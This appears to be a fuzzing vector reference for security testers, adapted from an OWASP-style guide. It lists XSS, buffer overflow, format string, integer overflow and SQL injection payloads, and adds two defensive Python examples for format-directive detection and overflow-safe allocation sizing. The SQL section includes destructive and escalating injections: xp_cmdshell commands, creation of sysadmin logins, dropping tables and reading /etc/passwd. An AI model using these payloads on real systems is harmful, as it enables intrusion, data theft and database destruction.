Cross Site Scripting (XSS)
For details on XSS: Cross-site Scripting (XSS)
>">alert("XSS")&
">@import"javascript:alert('XSS')";
>"'>
>%22%27>
'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'
">
>"
'';!--"=&{()}

Buffer Overflows and Format String Errors
Buffer Overflows (BFO)
A buffer overflow or memory corruption attack is a programming condition which allows valid data to overflow beyond its preallocated storage limit in memory.
For details on Buffer Overflows: Testing for Buffer Overflow
Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.
A x 5
A x 17
A x 33
A x 65
A x 129
A x 257
A x 513
A x 1024
A x 2049
A x 4097
A x 8193
A x 12288
Format String Errors (FSE)
Format string attacks are a class of vulnerabilities that involve supplying language-specific format tokens to execute arbitrary code or crash a program. The objective of fuzzing for such errors is to check for unfiltered user input.
An excellent introduction to FSE can be found in the USENIX paper entitled: Detecting Format String Vulnerabilities with Type Qualifiers
Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.
%s%p%x%d
.1024d
%.2049d
%p%p%p%p
%x%x%x%x
%d%d%d%d
%s%s%s%s
%99999999999s
%08x
%%20d
%%20n
%%20x
%%20s
%s%s%s%s%s%s%s%s%s%s
%p%p%p%p%p%p%p%p%p%p
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%-j%z%Z%t%i%e%g%f%a%C%S%08x%%
%s x 129
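An input-validation check for the vectors above, added here as an example and not taken from the guide: it scans untrusted input for printf-style directives, looking at both the raw text and its URL-decoded form, because the %%20n vector only becomes a real directive after decoding while decoding %08x destroys it. The FSE_VECTORS list and the classify() severity names are this example's own.

```python
import re
from urllib.parse import unquote

# Pattern follows the C directive grammar: % flags width .precision length conversion.
# A literal %% is matched first so it is never mistaken for a directive.
DIRECTIVE = re.compile(
    r"%%|%[-+ #0]*(?:\d+|\*)?(?:\.(?:\d+|\*))?(?:hh|h|ll|l|q|j|z|t|L)?[diouxXeEfFgGaAcspn]"
)

# Vectors taken from the list above; "%s x 129" is expanded to 129 repetitions.
FSE_VECTORS = ["%s%p%x%d", ".1024d", "%.2049d", "%99999999999s", "%08x",
               "%%20d", "%%20n", "%s" * 129]


def find_format_directives(value):
    """Return the distinct directives found in value.

    Both the raw and the URL-decoded text are scanned: "%%20n" decodes to "% n"
    (a directive with the space flag), whereas "%08x" decodes to a control byte
    followed by "x", so checking only one form misses vectors."""
    found = []
    for text in (value, unquote(value)):
        for m in DIRECTIVE.finditer(text):
            d = m.group(0)
            if d != "%%" and d not in found:
                found.append(d)
    return found


def is_write_directive(d):
    """%n (any flags/width/length) writes to memory, which is what makes an FSE exploitable."""
    return d.endswith("n")


def classify(value):
    """'write' if a %n variant is present, 'read' for any other directive, else 'clean'."""
    directives = find_format_directives(value)
    if any(is_write_directive(d) for d in directives):
        return "write"
    return "read" if directives else "clean"


if __name__ == "__main__":
    for v in FSE_VECTORS:
        print(repr(v[:24]), classify(v), find_format_directives(v))
```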
Integer Overflows (INT)
Integer overflow errors occur when a program fails to account for the fact that an arithmetic operation can result in a quantity either greater than a data type's maximum value or less than its minimum value. If a tester can cause the program to perform a memory allocation sized by such an overflowed quantity, the program can be potentially vulnerable to a buffer overflow attack.
-1
0
0x100
0x1000
0x3fffffff
0x7ffffffe
0x7fffffff
0x80000000
0xfffffffe
0xffffffff
0x10000
0x100000
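Why these particular values are in the list, shown with an added example that is not part of the guide: it models the 32-bit C arithmetic of a `malloc(count * elem_size)` call in Python, so the wrap-around that an undersized allocation depends on becomes visible, and pairs it with the bounds check that rejects every wrapping vector. The INT_VECTORS list is copied from above; the 32-bit width, the element size of 4 and the max_count limit are this example's assumptions.

```python
MASK32 = 0xFFFFFFFF
INT_VECTORS = [-1, 0, 0x100, 0x1000, 0x3fffffff, 0x7ffffffe, 0x7fffffff,
               0x80000000, 0xfffffffe, 0xffffffff, 0x10000, 0x100000]


def as_u32(v):
    """Value as a C unsigned 32-bit integer (size_t on a 32-bit target)."""
    return v & MASK32


def as_i32(v):
    """Value as a C signed 32-bit integer: 0x80000000 and above read as negative."""
    v &= MASK32
    return v - (1 << 32) if v & 0x80000000 else v


def unchecked_alloc_size(count, elem_size):
    """Naive C idiom: malloc(count * elem_size) with the product silently truncated.
    A wrapped result allocates a buffer far smaller than the count implies."""
    return as_u32(count * elem_size)


def checked_alloc_size(count, elem_size, max_count=1 << 20):
    """Hardened version: bound the count and verify the product fits in 32 bits.
    Returns None when the request must be rejected (assumed limit: 2**20 elements)."""
    c = as_i32(count)                 # a length field from the wire is often signed
    if c < 0 or c > max_count:
        return None
    total = c * elem_size
    return total if total <= MASK32 else None


def vectors_that_wrap(elem_size=4):
    """Vectors for which count * elem_size no longer equals the true product."""
    return [v for v in INT_VECTORS
            if unchecked_alloc_size(v, elem_size) != as_u32(v) * elem_size]


if __name__ == "__main__":
    for v in INT_VECTORS:
        print(f"{v:#12x} i32={as_i32(v):12d} unchecked={unchecked_alloc_size(v, 4):#12x} "
              f"checked={checked_alloc_size(v, 4)}")
```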
SQL Injection
This attack can affect the database layer of an application and is typically present when user input is not filtered for SQL statements.
For details on Testing SQL Injection: Testing for SQL Injection
SQL Injection is classified in the following two categories, depending on the exposure of database information (passive) or the alteration of database information (active).
• Passive SQL Injection
• Active SQL Injection
Active SQL Injection statements can have a detrimental effect on the underlying database if successfully executed.
Passive SQL Injection (SQP)
'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
||6
'||'6
(||6)
' OR 1=1--
OR 1=1
' OR '1'='1
; OR '1'='1'
%22+or+isnull%281%2F0%29+%2F*
%27+OR+%277659%27%3D%277659
%22+or+isnull%281%2F0%29+%2F*
%27+--+
' or 1=1--
" or 1=1--
' or 1=1 /*
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
Admin' OR '
'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--
) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;
' having 1=1--
' having 1=1--
' group by userid having 1=1--
' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--
' or 1 in (select @@version)--
' union all select @@version--
' OR 'unusual' = 'unusual'
' OR 'something' = 'some'+'thing'
' OR 'text' = N'text'
' OR 'something' like 'some%'
' OR 2 > 1
' OR 'text' > 't'
' OR 'whatever' in ('whatever')
' OR 2 BETWEEN 1 and 3
' or username like char(37);
' union select * from users where login = char(114,111,111,116);
' union select
Password:*/=1--
UNI/**/ON SEL/**/ECT
'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
'; EXEC ('SEL' + 'ECT US' + 'ER')
'/**/OR/**/1/**/=/**/1
' or 1/*
+or+isnull%281%2F0%29+%2F*
%27+OR+%277659%27%3D%277659
%22+or+isnull%281%2F0%29+%2F*
%27+--+&password=
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end --
' and 1 in (select var from temp)--
' union select 1,load_file('/etc/passwd'),1,1,1;
1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
' and 1=( if((load_file(char(110,46,101,120,116))char(39,39)),1,0));
Active SQL Injection (SQI)
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
CREATE USER name IDENTIFIED BY 'pass123'
CREATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users;
' ; drop table temp --
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'
INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))
GRANT CONNECT TO name; GRANT RESOURCE TO name;
INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)